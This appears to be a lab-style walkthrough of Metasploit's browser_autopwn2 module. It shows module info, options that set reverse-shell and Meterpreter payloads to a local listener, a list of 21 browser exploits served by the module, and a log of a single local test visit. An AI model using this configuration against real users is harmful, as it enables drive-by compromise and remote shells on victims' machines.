metasploit - browser_autopwn2

Thanks msf committer. Please read here for more details about browser_autopwn2.

msf auxiliary(browser_autopwn2) > info

       Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
     Module: auxiliary/server/browser_autopwn2
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-07-05

Provided by:
  sinn3r <sinn3r@metasploit.com>

Available actions:
  Name       Description
  ----       -----------
  WebServer  Start a bunch of modules and direct clients to appropriate exploits

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
  INCLUDE_PATTERN                   no        Pattern search to include specific modules
  Retries          true             no        Allow the browser to retry the module
  SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT          8080             yes       The local port to listen on.
  SSL              false            no        Negotiate SSL for incoming connections
  SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH          /welcome         no        The URI to use for this exploit (default is random)

Description:
  This module will automatically serve browser exploits. Here are the 
  options you can configure: The Include option allows you to specify 
  the kind of exploits to be loaded. For example, if you wish to load 
  just Adobe Flash exploits, then you can set Include to 
  'adobe_flash'. The Exclude option will ignore exploits. For example, 
  if you don't want any Adobe Flash exploits, you can set this. Also 
  note that the Exclude option will always be evaludated after the 
  Include option. The MaxExploits option specifies the max number of 
  exploits to load by Browser Autopwn. By default, 20 will be loaded. 
  But note that the client will probably not be vulnerable to all 20 
  of them, so only some will actually be served to the client. The 
  Content option allows you to provide a basic webpage. This is what 
  the user behind the vulnerable browser will see. You can simply set 
  a string, or you can do the file:// syntax to load an HTML file. 
  Note this option might break exploits so try to keep it as simple as 
  possible. The WhiteList option can be used to avoid visitors that 
  are outside the scope of your pentest engagement. IPs that are not 
  on the list will not be attacked. The MaxSessions option is used to 
  limit how many sessions Browser Autopwn is allowed to get. The 
  default -1 means unlimited. Combining this with other options such 
  as RealList and Custom404, you can get information about which 
  visitors (IPs) clicked on your malicious link, what exploits they 
  might be vulnerable to, redirect them to your own internal training 
  website without actually attacking them. The RealList is an option 
  that will list what exploits the client might be vulnerable to based 
  on basic browser information. If possible, you can run the exploits 
  for validation. For more information about Browser Autopwn, please 
  see the reference link.

References:
  https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2

---

msf auxiliary(browser_autopwn2) > set

Global
======

No entries in data store.

Module: server/browser_autopwn2
===============================

  Name                      Value
  ----                      -----
  CUSTOM404                 https://www.exploit-db.com/
  CookieName                __ua
  ExploitReloadTimeout      3000
  HTML::base64              none
  HTML::javascript::escape  0
  HTML::unicode             none
  HTMLContent               hello world
  HTTP::chunked             false
  HTTP::compression         none
  HTTP::header_folding      false
  HTTP::junk_headers        false
  HTTP::server_name         Apache
  InitialAutoRunScript      migrate -f
  JsObfuscate               0
  LHOST                     192.168.1.108
  MaxExploitCount           21
  MaxSessionCount           -1
  PAYLOAD_ANDROID           android/meterpreter/reverse_tcp
  PAYLOAD_ANDROID_LPORT     4443
  PAYLOAD_FIREFOX           firefox/shell_reverse_tcp
  PAYLOAD_FIREFOX_LPORT     4442
  PAYLOAD_GENERIC           generic/shell_reverse_tcp
  PAYLOAD_GENERIC_LPORT     4459
  PAYLOAD_JAVA              java/meterpreter/reverse_tcp
  PAYLOAD_JAVA_LPORT        4448
  PAYLOAD_LINUX             linux/x86/meterpreter/reverse_tcp
  PAYLOAD_LINUX_LPORT       4445
  PAYLOAD_OSX               osx/x86/shell_reverse_tcp
  PAYLOAD_OSX_LPORT         4447
  PAYLOAD_UNIX              cmd/unix/reverse
  PAYLOAD_UNIX_LPORT        4446
  PAYLOAD_WIN               windows/meterpreter/reverse_tcp
  PAYLOAD_WIN_LPORT         4444
  Retries                   true
  SRVHOST                   0.0.0.0
  SRVPORT                   8080
  SSL                       false
  SSLCompression            false
  ShowExploitList           true
  TCP::max_send_size        0
  TCP::send_delay           0
  URIPATH                   /welcome
  VERBOSE                   true

---

msf auxiliary(browser_autopwn2) > show options 

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH          /welcome         no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...

msf auxiliary(browser_autopwn2) > 
[*] Starting listeners...
[*] Time spent: 9.462520245
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/welcome
[*] Local IP: http://192.168.1.108:8080/welcome

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Path            Payload
 -----  ----       ----                                       ----            -------
 1      Excellent  firefox_webidl_injection                   /gmLTYN         firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         /JEmVuiQaKIrw   firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         /obmUrBMlx      firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  /KmenmjQhUhnT   firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             /TgUj           android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      /RKbn           android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_shader_drawing_fill            /BMAAabhunvx    windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_opaque_background_uaf          /GBwNOaqCYlFW   windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_nellymoser_bof                 /NZVMFwLZMLgbr  windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_hacking_team_uaf               /MIfAzyPrpkm    windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_worker_byte_array_uaf          /YvafdTNG       windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_domain_memory_uaf              /WpEdowncDoshx  windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_copy_pixels_to_byte_array      /IrnNHy         windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_casi32_int_overflow            /ExycSI         windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_uncompress_zlib_uaf            /bPjzBO         windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_shader_job_overflow            /uoDtKDBidW     windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_pixel_bender_bof               /rZclWjWFPbnD   windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_net_connection_confusion       /KfTKxIbCnv     windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      /OFwAxIJNjLyV   windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                /OUcjis         windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  /VPZdapAQVLH    windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.1.108:8080/welcome
[*] Server started.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - No cookie received, resorting to headers hash.
[*] 192.168.1.108    browser_autopwn2 - Gathering target information.
[*] 192.168.1.108    browser_autopwn2 - Sending HTML response.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Info receiver page called.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Received sniffed browser data over POST:
192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - {"os_name"=>["Linux"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Firefox"], "ua_ver"=>["35.0"], "arch"=>["x86_64"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Serving exploit to user with tag WkrwqI
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Setting target "WkrwqI" to :tried.
[*] 192.168.1.108    browser_autopwn2 - 192.168.1.108    browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108    browser_autopwn2 - User 192.168.1.108 (Tag: WkrwqI) visited our malicious link, but no exploits found suitable.
[*] 192.168.1.108    browser_autopwn2 - No suitable exploits to send.

---

REFERENCES

https://community.rapid7.com/community/metasploit/blog/2015/07/15/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter–part-1
https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter–part-2